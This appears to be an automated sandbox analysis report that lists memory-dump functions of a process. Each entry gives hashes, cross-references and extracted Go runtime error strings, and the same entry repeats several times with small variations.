String ID: because dotdotdotGC worker (active)bad lfnode addressbad manualFreeListchunk out of ordercleantimers: bad pcompression methoddimension overflowelem align too bigforEachP: not donegarbage collectionindex out of rangeruntime.semacreateruntime.semawakeupstopping$ to finalizer GC (dedicated)GC assist waitGC worker initbad allocCountbad restart PCbad span statefinalizer waitkey size wrongnil elem type!no module datanot a PNG fileread mem statssemaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.WaituserAren$, not a function0123456789ABCDEF0123456789abcdefGC scavenge waitGC worker (idle)GODEBUG: value "$runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]trace: non-empty full trace bufferattempt to clear non-empty span setfindrunnable: netpoll$runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeToNearestEvenToNearestAwayToZeroAwayFromZeroToNegativeInfToPositiveInfcannot convert slice with length %y to array or pointer to a$runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)acquireSudog: found s.elem != nil in cachefatal error: cgo callback before cgo callnon-empty ma
API String ID: 0-4243375483
Opcode ID: 6f135e5f3e55abf9bbd164dfe72cdbf175c7671c76e591ee6b18fd89ea6859c4
Instruction ID: 6950d4553aaa4f6cf53be9e336738b883792311128ea998788ab5370a32b8ef3
Opcode Fuzzy Hash: 6f135e5f3e55abf9bbd164dfe72cdbf175c7671c76e591ee6b18fd89ea6859c4
Instruction Fuzzy Hash: 145184716896C491E666AF92EC887DBA7A5F748B80F494432FA8C53F97EF38C4018344

Function 000002EBF9BA7902 Relevance: 7.6, Strings: 6, Instructions: 113COMMON

Download Yara Rule

Strings

runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)acquireSudog: found s.elem != nil in cachefatal error: cgo callback before cgo callnon-empty ma, xrefs: 000002EBF9BA7CAC
to finalizer GC (dedicated)GC assist waitGC worker initbad allocCountbad restart PCbad span statefinalizer waitkey size wrongnil elem type!no module datanot a PNG fileread mem statssemaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.WaituserAren, xrefs: 000002EBF9BA7BA1, 000002EBF9BA7BF8, 000002EBF9BA7C62
runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeToNearestEvenToNearestAwayToZeroAwayFromZeroToNegativeInfToPositiveInfcannot convert slice with length %y to array or pointer to a, xrefs: 000002EBF9BA7CBD
runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]trace: non-empty full trace bufferattempt to clear non-empty span setfindrunnable: netpoll, xrefs: 000002EBF9BA7BB6, 000002EBF9BA7C0D, 000002EBF9BA7C77
because dotdotdotGC worker (active)bad lfnode addressbad manualFreeListchunk out of ordercleantimers: bad pcompression methoddimension overflowelem align too bigforEachP: not donegarbage collectionindex out of rangeruntime.semacreateruntime.semawakeupstopping, xrefs: 000002EBF9BA7C3C
, not a function0123456789ABCDEF0123456789abcdefGC scavenge waitGC worker (idle)GODEBUG: value ", xrefs: 000002EBF9BA7C9D

Memory Dump Source

Source File: 00000000.00000002.4572444295.000002EBF9B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002EBF9B90000, based on PE: true

Associated: 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA7FC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA869000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA898000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE2C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE33000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE5A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE61000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ebf9b90000_O16AWEA5iQ.jbxd

Similarity

API ID:
String ID: because dotdotdotGC worker (active)bad lfnode addressbad manualFreeListchunk out of ordercleantimers: bad pcompression methoddimension overflowelem align too bigforEachP: not donegarbage collectionindex out of rangeruntime.semacreateruntime.semawakeupstopping$ to finalizer GC (dedicated)GC assist waitGC worker initbad allocCountbad restart PCbad span statefinalizer waitkey size wrongnil elem type!no module datanot a PNG fileread mem statssemaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.WaituserAren$, not a function0123456789ABCDEF0123456789abcdefGC scavenge waitGC worker (idle)GODEBUG: value "$runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]trace: non-empty full trace bufferattempt to clear non-empty span setfindrunnable: netpoll$runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeToNearestEvenToNearestAwayToZeroAwayFromZeroToNegativeInfToPositiveInfcannot convert slice with length %y to array or pointer to a$runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)acquireSudog: found s.elem != nil in cachefatal error: cgo callback before cgo callnon-empty ma
API String ID: 0-4243375483
Opcode ID: 7040ed742e8de3737867c37ef205401812efd4c5bd89b5677d85947c3a374445
Instruction ID: 19e18e8daf8960634be7bfaea5e44e0fac952293bcf68f2eecdcac78451a77ca
Opcode Fuzzy Hash: 7040ed742e8de3737867c37ef205401812efd4c5bd89b5677d85947c3a374445
Instruction Fuzzy Hash: 955184716896C491E666AF92EC887DBA7A5F748B80F494432FA8C53F97EF38C4018344

Function 000002EBF9BA78F6 Relevance: 7.6, Strings: 6, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)acquireSudog: found s.elem != nil in cachefatal error: cgo callback before cgo callnon-empty ma, xrefs: 000002EBF9BA7CAC
to finalizer GC (dedicated)GC assist waitGC worker initbad allocCountbad restart PCbad span statefinalizer waitkey size wrongnil elem type!no module datanot a PNG fileread mem statssemaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.WaituserAren, xrefs: 000002EBF9BA7BA1, 000002EBF9BA7BF8, 000002EBF9BA7C62
runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeToNearestEvenToNearestAwayToZeroAwayFromZeroToNegativeInfToPositiveInfcannot convert slice with length %y to array or pointer to a, xrefs: 000002EBF9BA7CBD
runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]trace: non-empty full trace bufferattempt to clear non-empty span setfindrunnable: netpoll, xrefs: 000002EBF9BA7BB6, 000002EBF9BA7C0D, 000002EBF9BA7C77
because dotdotdotGC worker (active)bad lfnode addressbad manualFreeListchunk out of ordercleantimers: bad pcompression methoddimension overflowelem align too bigforEachP: not donegarbage collectionindex out of rangeruntime.semacreateruntime.semawakeupstopping, xrefs: 000002EBF9BA7C3C
, not a function0123456789ABCDEF0123456789abcdefGC scavenge waitGC worker (idle)GODEBUG: value ", xrefs: 000002EBF9BA7C9D

Memory Dump Source

Source File: 00000000.00000002.4572444295.000002EBF9B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002EBF9B90000, based on PE: true

Associated: 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA7FC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA869000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA898000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE2C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE33000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE5A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE61000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ebf9b90000_O16AWEA5iQ.jbxd

Similarity

API ID:
String ID: because dotdotdotGC worker (active)bad lfnode addressbad manualFreeListchunk out of ordercleantimers: bad pcompression methoddimension overflowelem align too bigforEachP: not donegarbage collectionindex out of rangeruntime.semacreateruntime.semawakeupstopping$ to finalizer GC (dedicated)GC assist waitGC worker initbad allocCountbad restart PCbad span statefinalizer waitkey size wrongnil elem type!no module datanot a PNG fileread mem statssemaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.WaituserAren$, not a function0123456789ABCDEF0123456789abcdefGC scavenge waitGC worker (idle)GODEBUG: value "$runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]trace: non-empty full trace bufferattempt to clear non-empty span setfindrunnable: netpoll$runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeToNearestEvenToNearestAwayToZeroAwayFromZeroToNegativeInfToPositiveInfcannot convert slice with length %y to array or pointer to a$runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)acquireSudog: found s.elem != nil in cachefatal error: cgo callback before cgo callnon-empty ma
API String ID: 0-4243375483
Opcode ID: 6f135e5f3e55abf9bbd164dfe72cdbf175c7671c76e591ee6b18fd89ea6859c4
Instruction ID: 6950d4553aaa4f6cf53be9e336738b883792311128ea998788ab5370a32b8ef3
Opcode Fuzzy Hash: 6f135e5f3e55abf9bbd164dfe72cdbf175c7671c76e591ee6b18fd89ea6859c4
Instruction Fuzzy Hash: 145184716896C491E666AF92EC887DBA7A5F748B80F494432FA8C53F97EF38C4018344

Function 000002EBF9BA78F0 Relevance: 7.6, Strings: 6, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)acquireSudog: found s.elem != nil in cachefatal error: cgo callback before cgo callnon-empty ma, xrefs: 000002EBF9BA7CAC
to finalizer GC (dedicated)GC assist waitGC worker initbad allocCountbad restart PCbad span statefinalizer waitkey size wrongnil elem type!no module datanot a PNG fileread mem statssemaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.WaituserAren, xrefs: 000002EBF9BA7BA1, 000002EBF9BA7BF8, 000002EBF9BA7C62
runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeToNearestEvenToNearestAwayToZeroAwayFromZeroToNegativeInfToPositiveInfcannot convert slice with length %y to array or pointer to a, xrefs: 000002EBF9BA7CBD
runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]trace: non-empty full trace bufferattempt to clear non-empty span setfindrunnable: netpoll, xrefs: 000002EBF9BA7BB6, 000002EBF9BA7C0D, 000002EBF9BA7C77
because dotdotdotGC worker (active)bad lfnode addressbad manualFreeListchunk out of ordercleantimers: bad pcompression methoddimension overflowelem align too bigforEachP: not donegarbage collectionindex out of rangeruntime.semacreateruntime.semawakeupstopping, xrefs: 000002EBF9BA7C3C
, not a function0123456789ABCDEF0123456789abcdefGC scavenge waitGC worker (idle)GODEBUG: value ", xrefs: 000002EBF9BA7C9D

Memory Dump Source

Source File: 00000000.00000002.4572444295.000002EBF9B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002EBF9B90000, based on PE: true

Associated: 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA7FC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA869000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA898000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE2C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE33000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE5A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE61000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ebf9b90000_O16AWEA5iQ.jbxd

Similarity

API ID:
String ID: because dotdotdotGC worker (active)bad lfnode addressbad manualFreeListchunk out of ordercleantimers: bad pcompression methoddimension overflowelem align too bigforEachP: not donegarbage collectionindex out of rangeruntime.semacreateruntime.semawakeupstopping$ to finalizer GC (dedicated)GC assist waitGC worker initbad allocCountbad restart PCbad span statefinalizer waitkey size wrongnil elem type!no module datanot a PNG fileread mem statssemaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.WaituserAren$, not a function0123456789ABCDEF0123456789abcdefGC scavenge waitGC worker (idle)GODEBUG: value "$runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]trace: non-empty full trace bufferattempt to clear non-empty span setfindrunnable: netpoll$runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeToNearestEvenToNearestAwayToZeroAwayFromZeroToNegativeInfToPositiveInfcannot convert slice with length %y to array or pointer to a$runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)acquireSudog: found s.elem != nil in cachefatal error: cgo callback before cgo callnon-empty ma
API String ID: 0-4243375483
Opcode ID: ef2e849c1a80946784593230ef1b0b45f6db9b19155d2a7df0f649afbbc15599
Instruction ID: 26fba07455d6b9557c55180e34efaf50fce3ed45f55ecd9d7e13c4d00c9576c4
Opcode Fuzzy Hash: ef2e849c1a80946784593230ef1b0b45f6db9b19155d2a7df0f649afbbc15599
Instruction Fuzzy Hash: 735174716896C491E666AF92EC887DBA7A5F748B80F494432FA8C53F97EF38C4418344

Function 000002EBF9BA78E4 Relevance: 7.6, Strings: 6, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)acquireSudog: found s.elem != nil in cachefatal error: cgo callback before cgo callnon-empty ma, xrefs: 000002EBF9BA7CAC
to finalizer GC (dedicated)GC assist waitGC worker initbad allocCountbad restart PCbad span statefinalizer waitkey size wrongnil elem type!no module datanot a PNG fileread mem statssemaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.WaituserAren, xrefs: 000002EBF9BA7BA1, 000002EBF9BA7BF8, 000002EBF9BA7C62
runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeToNearestEvenToNearestAwayToZeroAwayFromZeroToNegativeInfToPositiveInfcannot convert slice with length %y to array or pointer to a, xrefs: 000002EBF9BA7CBD
runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]trace: non-empty full trace bufferattempt to clear non-empty span setfindrunnable: netpoll, xrefs: 000002EBF9BA7BB6, 000002EBF9BA7C0D, 000002EBF9BA7C77
because dotdotdotGC worker (active)bad lfnode addressbad manualFreeListchunk out of ordercleantimers: bad pcompression methoddimension overflowelem align too bigforEachP: not donegarbage collectionindex out of rangeruntime.semacreateruntime.semawakeupstopping, xrefs: 000002EBF9BA7C3C
, not a function0123456789ABCDEF0123456789abcdefGC scavenge waitGC worker (idle)GODEBUG: value ", xrefs: 000002EBF9BA7C9D

Memory Dump Source

Source File: 00000000.00000002.4572444295.000002EBF9B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002EBF9B90000, based on PE: true

Associated: 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA7FC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA869000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA898000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE2C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE33000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE5A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE61000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ebf9b90000_O16AWEA5iQ.jbxd

Similarity

API ID:
String ID: because dotdotdotGC worker (active)bad lfnode addressbad manualFreeListchunk out of ordercleantimers: bad pcompression methoddimension overflowelem align too bigforEachP: not donegarbage collectionindex out of rangeruntime.semacreateruntime.semawakeupstopping$ to finalizer GC (dedicated)GC assist waitGC worker initbad allocCountbad restart PCbad span statefinalizer waitkey size wrongnil elem type!no module datanot a PNG fileread mem statssemaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.WaituserAren$, not a function0123456789ABCDEF0123456789abcdefGC scavenge waitGC worker (idle)GODEBUG: value "$runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]trace: non-empty full trace bufferattempt to clear non-empty span setfindrunnable: netpoll$runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeToNearestEvenToNearestAwayToZeroAwayFromZeroToNegativeInfToPositiveInfcannot convert slice with length %y to array or pointer to a$runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)acquireSudog: found s.elem != nil in cachefatal error: cgo callback before cgo callnon-empty ma
API String ID: 0-4243375483
Opcode ID: 6f135e5f3e55abf9bbd164dfe72cdbf175c7671c76e591ee6b18fd89ea6859c4
Instruction ID: 6950d4553aaa4f6cf53be9e336738b883792311128ea998788ab5370a32b8ef3
Opcode Fuzzy Hash: 6f135e5f3e55abf9bbd164dfe72cdbf175c7671c76e591ee6b18fd89ea6859c4
Instruction Fuzzy Hash: 145184716896C491E666AF92EC887DBA7A5F748B80F494432FA8C53F97EF38C4018344

Function 000002EBF9BA78EA Relevance: 7.6, Strings: 6, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)acquireSudog: found s.elem != nil in cachefatal error: cgo callback before cgo callnon-empty ma, xrefs: 000002EBF9BA7CAC
to finalizer GC (dedicated)GC assist waitGC worker initbad allocCountbad restart PCbad span statefinalizer waitkey size wrongnil elem type!no module datanot a PNG fileread mem statssemaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.WaituserAren, xrefs: 000002EBF9BA7BA1, 000002EBF9BA7BF8, 000002EBF9BA7C62
runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeToNearestEvenToNearestAwayToZeroAwayFromZeroToNegativeInfToPositiveInfcannot convert slice with length %y to array or pointer to a, xrefs: 000002EBF9BA7CBD
runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]trace: non-empty full trace bufferattempt to clear non-empty span setfindrunnable: netpoll, xrefs: 000002EBF9BA7BB6, 000002EBF9BA7C0D, 000002EBF9BA7C77
because dotdotdotGC worker (active)bad lfnode addressbad manualFreeListchunk out of ordercleantimers: bad pcompression methoddimension overflowelem align too bigforEachP: not donegarbage collectionindex out of rangeruntime.semacreateruntime.semawakeupstopping, xrefs: 000002EBF9BA7C3C
, not a function0123456789ABCDEF0123456789abcdefGC scavenge waitGC worker (idle)GODEBUG: value ", xrefs: 000002EBF9BA7C9D

Memory Dump Source

Source File: 00000000.00000002.4572444295.000002EBF9B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002EBF9B90000, based on PE: true

Associated: 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA7FC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA869000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA898000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE2C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE33000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE5A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE61000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ebf9b90000_O16AWEA5iQ.jbxd

Similarity

API ID:
String ID: because dotdotdotGC worker (active)bad lfnode addressbad manualFreeListchunk out of ordercleantimers: bad pcompression methoddimension overflowelem align too bigforEachP: not donegarbage collectionindex out of rangeruntime.semacreateruntime.semawakeupstopping$ to finalizer GC (dedicated)GC assist waitGC worker initbad allocCountbad restart PCbad span statefinalizer waitkey size wrongnil elem type!no module datanot a PNG fileread mem statssemaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.WaituserAren$, not a function0123456789ABCDEF0123456789abcdefGC scavenge waitGC worker (idle)GODEBUG: value "$runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]trace: non-empty full trace bufferattempt to clear non-empty span setfindrunnable: netpoll$runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeToNearestEvenToNearestAwayToZeroAwayFromZeroToNegativeInfToPositiveInfcannot convert slice with length %y to array or pointer to a$runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)acquireSudog: found s.elem != nil in cachefatal error: cgo callback before cgo callnon-empty ma
API String ID: 0-4243375483
Opcode ID: 4fc558f7b6513e8f8663ed4f0593517694983a65fcaffaa9a679123f5be4c963
Instruction ID: 3d2cdfee5bfd7b292227558792f6d6b511b70b1721bf75dfb9a39df1c3c21d58
Opcode Fuzzy Hash: 4fc558f7b6513e8f8663ed4f0593517694983a65fcaffaa9a679123f5be4c963
Instruction Fuzzy Hash: D55174716896C491E666AF91EC887DBA7A5F748B80F494432FA8C53F97EF38C4018344

Function 000002EBF9BA78DE Relevance: 7.6, Strings: 6, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)acquireSudog: found s.elem != nil in cachefatal error: cgo callback before cgo callnon-empty ma, xrefs: 000002EBF9BA7CAC
to finalizer GC (dedicated)GC assist waitGC worker initbad allocCountbad restart PCbad span statefinalizer waitkey size wrongnil elem type!no module datanot a PNG fileread mem statssemaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.WaituserAren, xrefs: 000002EBF9BA7BA1, 000002EBF9BA7BF8, 000002EBF9BA7C62
runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeToNearestEvenToNearestAwayToZeroAwayFromZeroToNegativeInfToPositiveInfcannot convert slice with length %y to array or pointer to a, xrefs: 000002EBF9BA7CBD
runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]trace: non-empty full trace bufferattempt to clear non-empty span setfindrunnable: netpoll, xrefs: 000002EBF9BA7BB6, 000002EBF9BA7C0D, 000002EBF9BA7C77
because dotdotdotGC worker (active)bad lfnode addressbad manualFreeListchunk out of ordercleantimers: bad pcompression methoddimension overflowelem align too bigforEachP: not donegarbage collectionindex out of rangeruntime.semacreateruntime.semawakeupstopping, xrefs: 000002EBF9BA7C3C
, not a function0123456789ABCDEF0123456789abcdefGC scavenge waitGC worker (idle)GODEBUG: value ", xrefs: 000002EBF9BA7C9D

Memory Dump Source

Source File: 00000000.00000002.4572444295.000002EBF9B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002EBF9B90000, based on PE: true

Associated: 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA7FC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA869000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA898000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE2C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE33000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE5A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE61000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ebf9b90000_O16AWEA5iQ.jbxd

Similarity

